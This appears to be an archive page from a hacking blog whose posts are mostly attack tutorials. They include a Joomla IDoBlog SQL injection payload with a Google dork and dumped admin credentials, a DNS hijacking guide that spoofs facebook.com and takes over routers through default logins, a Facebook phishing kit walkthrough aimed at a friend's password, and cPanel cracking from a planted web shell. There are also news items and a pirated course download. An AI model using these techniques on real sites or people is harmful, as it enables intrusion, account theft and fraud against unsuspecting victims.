Author Archives: rajathacking
Joomla Hacking Tutorial
Joomla Hacking Tutorial
If someone tells that HACKED Joomla, talking rubbish!!!
But people still hacked sites that use Joomla as Content Management System?!?
Joomla is made of components and modules and there are some developers apart from
official team that offer their solutions to improve Joomla.
That components and modules mede by that other developers are weak spots!
I hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can’t tell that I hacked Joomla!
Finding Exploit And Target : Those two steps could go in different order, depend what you find first target or exploit…
Google dork: inurl:”option=com_idoblog”
Comes up with results for about 140,000 pages
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vulnrablity
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–
Exploit can be separated in two parts:
Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don’t exist, exploit won’t worked (not completely confirmed)
Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–
This part looking for username and password from jos_users table
Testing Vulnerability
Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick ‘Load images automatically’
Go to:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Site load normally…
Go to:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content blog Profile Admin
Go to:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1–
Site is vulnerable
Inject Target
Open reiluke SQLiHelper 2.7
In Target copy
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject
Follow standard steps until you find Column Name, as a result we have
Notice that exploit from inj3ct0r wouldn’t work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data
Let Dump username, email, password from Column Name jos153_users. Click on Dump Now
username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI
Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time…
The easiest way to hack is to reset Admin password!
Admin Password Reset
Go to:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request
Hacker Demanded $50,000 for not releasing Stolen Symantec Source Code
According to email transcripts posted to Pastebin yesterday, and confirmed by the company, a group of hackers attempted to extort $50,000 from Symantec in exchange for not releasing its stolen PCAnywhere and Norton Antivirus source code.
Hackers associated with the group Anonymous known as the Lords of Dharamaja leaked what appears to be another 1.27 gigabytes of source code from Symantec Monday night, what they claim is the source code of the Symantec program PCAnywhere.
A 1.2GB file labeled “Symantec’s pcAnywhere Leaked Source Code” has been posted to The Pirate Bay.
The leak comes as little surprise: Symantec had previously revealed that the hackers had obtained 2006 versions of that code along with other Symantec products from the same time period, and warned users of PCAnywhere to disable its functionality until they patched the program earlier this month.
The emails between Symantec employee Sam Thomas and the hacker(s) Yamatough, began in January. Symantec confirmed in a statement that it had contacted law enforcement after confirming the theft of the code and that the email exchange was, in fact, part of a criminal investigation. The email thread ended yesterday with Yamatough threatening to immediately release the code.
VTC Ethical Hacking and Penetration Testing
VTC Ethical Hacking and Penetration Testing
Lynda.com WordPress 3.0 Essential Training 440MB
Lynda.com WordPress 3.0 Essential Training-JGTiSO | 500Mb
Genre: Video Trainning
In WordPress 3.0 Essential Training, author Morten Rand-Hendriksen shows how to use WordPress 3.0 to create feature-rich blogs and web sites. The course includes a walkthrough of common tasks in WordPress, from setting up an account to launching self-hosted sites. Also included are tutorials on inserting media, installing plugins, creating custom themes, and incorporating search engine optimization Exercise files accompany the course.
Password: mediafirebd.com (if require)
WordPress 3.0 Essential Training Download
DNS Hacking/Hijacking Tutorial
This is an introduction to DNS poisoning which also includes an example of quite a nifty application of it using the IP Experiment. It’s purely educational, so I’m not responsible for how you use the information in it.
To start, you’ll need
• A computer running Linux (Ubuntu in my case)
• A basic understanding of how the Domain Name System (DNS) works.
Note that this is a more advanced topic; don’t try this if you don’t know what you’re doing.
Why DNS?
The DNS provides a way for computers to translate the domain names we see to the physical IPs they represent. When you load a webpage, your browser will ask its DNS server for the IP of the host you requested, and the server will respond. Your browser will then request the webpage from the server with the IP address that the DNS server supplied.
If we can find a way to tell the client the wrong IP address, and give them the IP of a malicious server instead, we can do some damage.
Malicious DNS Server
So if we want to send clients to a malicious web server, first we need to tell them its IP, and so we need to set up a malicious DNS server.
The server I’ve selected is dnsmasq – its lightweight and the only one that works for this purpose (that I’ve found)
To install dnsmasq on Ubuntu, run sudo apt-get install dnsmasq, or on other distributions of Linux, use the appropriate package manager.
Once you’ve installed it you can go and edit the configuration file (/etc/dnsmasq.conf)
sudo gedit /etc/dnsmasq.conf
The values in there should be sufficient for most purposes. What we want to do is hard-code some IPs for certain servers we want to spoof
The format for this is address=/HOST/IP
So for example;
address=/facebook.com/63.63.63.63
where 63.63.63.63 is the IP of your malicious web server
Save the file and restart dnsmasq by running
sudo /etc/init.d/dnsmasq restart
You now have a DNS server running which will redirect requests for facebook.com to 63.63.63.63
Malicious Web Server
You probably already have a web server installed. If not, install apache. This is pretty basic, so I won’t cover it here.
There are a couple of things you can do with the web server. It will be getting all the traffic intended for the orignal website, so the most likely cause of action would be to set up some sort of phishing site
I’ll presume you know how to do that though
Another alternative is to set up some sort of transparent proxy which logs all activity. I might come back to this in the future.
I Can Be Your DNS Server Plz?
An alternative is to, instead of a spoof webserver, set up a Metasploit browser_autopwn module . You can have lots of fun with that
But how do you get a victim? Well this is where my project, the IP Experiment could come in handy
If you don’t know, the IP Experiment basically harvests people’s IPs through websites such as forums and scans them for open ports. A surprising number of these IPs have port 80 open and more often that not, that leads straight to a router configuration mini-site. ‘Admin’ and ‘password’ will get you far in life; its fairly easy to login and change the DNS settings.
Tutorial by doc
Learn How to Hack Facebook Password
Hacking Facebook Account Password: Facebook Phishing for Hacking Facebook
Facebook has evolved into one of the hottest social networking website in the world. Here is a simple tutorial that you can use to hack your friend’s facebook password. Here i’m writting on hacking Facebbok password using Facebook Phisher.
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public.[Read more about phishing on Wikipedia]
Please Note: Phishing is legally offensive. I am not responsible for any action done by you.
Hacking Facebook password:
Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. I recommend the use of Phishing to hack facebook account since it is the easiest one.
1. First of all download Facebook Phisher
2. The downloaded file contains:
- Index.html
- write.php
3. Upload both files to any of these free webhost sites:
See Best Free Webhosting websites
4. Now, send this phisher link (index.html link) to your victim and make him login to his Facebook account using your sent Phisher.
5. Once he logs in to his Facebook account using Phisher, all his typed Facebook id and password is stored in “passes.txt”. This file is created in your webhost control panel as shown.
If you dont get passes.txt, try refreshing your page.Once you get passes.txt, you get Facebook password and can easily use it for hacking Facebook account.
6. Now, open passes.txt to get hacked Facebook id and password as shown.
Hope this tutorial was useful for you.
Don’t Forget to Leave a Comment 🙂
Cpanel Hacking/Cracking Tutorial
Today we will Learn CPANEL cracking or Hacking i.e gaining password for port no 2082 on website first of all we need a cpanel cracking shell on the server because we are going to crack those websites cpanels which are hosted on the shelled server.
so
in first step :- grab the usernames of the websites using command ls /var/mail or use the "Grab the usernames from /etc/passwd" option in the shell
press the go button we have done from our side lets wait and watch ,if we have supplied good passwords then shell will show a message " [~]# cracking success with username "xyz" with password "xyz" " otherwise it will show "[~] Please put some good passwords to crack username "xyz" :( "
so chances of success depends on password list that we are using in cracking process
Credits To z3r0 c00l and Team Indishell
Hackers Plan to Launch Satellite for Internet to Bypass SOPa
The term hacker can be used to mean a several understandings amongst them there are two major’s one which include “positivity” and the “negativity”. The hackers on facing the internet ban from the United states as a result of SOPA (Stop Online Piracy Act) have made a plan to launch there own satellite in the space for providing an internet which may be free from all kinds of bans and restrictions. This group of hackers belong to Germany.
What is this Plan and How is this Satellite going to work?
The plan majorly includes on launching a single satellite in the space and which will be a low orbit satellite. That will surely work under the solar power as per the satellite general rule of operation and will communicate with ground stations to make a network. This network will operate like a GPS system and will be called as “Hackerspace Global Grid (HGG)”. When any station will be under the satellite range then it will take the signals and will direct it to the other stations also and a user can gain permanent access to the network. This theory seems to be applied but there are certain hurdles in the plan and which needs to be resolved first.
Some Major Basic Hurdles:-
As we know that with the advancement of the technology we all are able to travel in the space and are able to send the satellites in the orbit of earth using rockets. But still this technology is hell costly also. Plus! There are no vital rules for the space like in case of earth and no single country can govern the space so anyone can make this satellite to stop work without any specific legal permission.
In order to make it a geo synchronous the radius of the orbit will surely get decreased and it will move in a fast manner and for the HGG project this distance seems to be large for the signals to be transmitted with a 100% quality aspect.
So what’s next with this HGG project?
The team is still moving forward to make this possible and its deciding to make the ground stations. If you are fascinated with this project and want such a network for the world them go here: Constellation to join this project. A project joined by HGG for collaboration.
For Further Detailed sources about this news rather than us visit BBC NEWS.
Hello wor
Welcome to WordPress.com. After you read this, you should delete and write your own post, with a new title above. Or hit Add New on the left (of the admin dashboard) to start a fresh post.
Here are some suggestions for your first post.
- You can find new ideas for what to blog about by reading the Daily Post.
- Add PressThis to your browser. It creates a new blog post for you about any interesting page you read on the web.
- Make some changes to this page, and then hit preview on the right. You can always preview any post or edit it before you share it to the world.
rajathacking 